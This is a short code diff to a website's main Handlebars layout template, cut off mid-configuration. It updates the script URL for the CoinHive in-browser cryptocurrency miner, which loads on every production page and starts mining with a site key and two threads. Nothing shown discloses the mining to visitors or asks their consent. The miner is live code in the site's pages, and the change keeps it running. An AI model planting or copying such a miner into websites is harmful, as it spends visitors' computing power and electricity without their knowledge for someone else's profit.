--- a/views/layouts/main.handlebars
+++ b/views/layouts/main.handlebars
@@ -32,7 +32,7 @@
 
   <script src="/js/main.min.js" async></script>
   {{#unless ENV_DEVELOPMENT}}
-    <script src="https://coin-hive.com/lib/coinhive.min.js"></script>
+    <script src="https://coinhive.com/lib/coinhive.min.js"></script>
     <script>
       var miner = new CoinHive.Anonymous('e4cjnPnR00ZZFwzJdeC6MIIVFA7GdMLi', {
         threads: 2
